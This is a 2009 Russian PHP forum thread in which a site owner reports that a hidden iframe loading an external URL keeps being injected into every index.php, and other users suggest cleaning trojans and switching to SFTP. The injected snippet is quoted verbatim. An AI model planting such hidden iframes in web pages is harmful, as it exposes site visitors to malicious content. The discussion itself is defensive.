Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
PHP. Практика создания Web-сайтов (второе издание). Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. Социальная инженерия и социальные хакеры. Авторы: Кузнецов М.В., Симдянов И.В. PHP на примерах (2 издание). Авторы: Кузнецов М.В., Симдянов И.В. Самоучитель PHP 5 / 6 (3 издание). Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Форум PHP

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: Взлом. Как бороться (xcount.cc)?
 
 автор: sd607   (16.05.2009 в 01:40)   письмо автору
 
 

Столкнулся с такой проблемой. Периодически в конец всех index.php прописывается следующий код:


<html><body><div style="display:none"><iframe src="http://xcount.cc/ads/in.cgi?13" width="320" height="240"></iframe></div></body></html>


И его разновидности. При последнем вскрытии было обнаружено множество файлов jid3.php.

Кто-нибудь сталкивался? Каким образом можно было так вломиться? Получается полный доступ над ФТП. Закинут шелл? Утекли пароли? Хостинг? Где начинать копать?

Вообще можно чем-то глубоко протестировать скрипты на уязвимость?
Как бой с тенью... вычищаем, меняем пароли. 1-2 недели, повторение истории.
Хэлп плиз.

  Ответить  
 
 автор: Пётр Петрович   (16.05.2009 в 01:52)   письмо автору
 
   для: sd607   (16.05.2009 в 01:40)
 

1. Не посещать порно-сайты (самое сложное в данной ситуации).
2. Почистить свой компьютер от троянов, поставить хороший антивирус для профилактики заражения.

Лечитесь!

  Ответить  
 
 автор: Евгений Петров   (16.05.2009 в 03:32)   письмо автору
 
   для: Пётр Петрович   (16.05.2009 в 01:52)
 

Не хранить пароли от фтп в фаре и других фтп клиентах.
Использовать SFTP вместоFTP.

  Ответить  
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования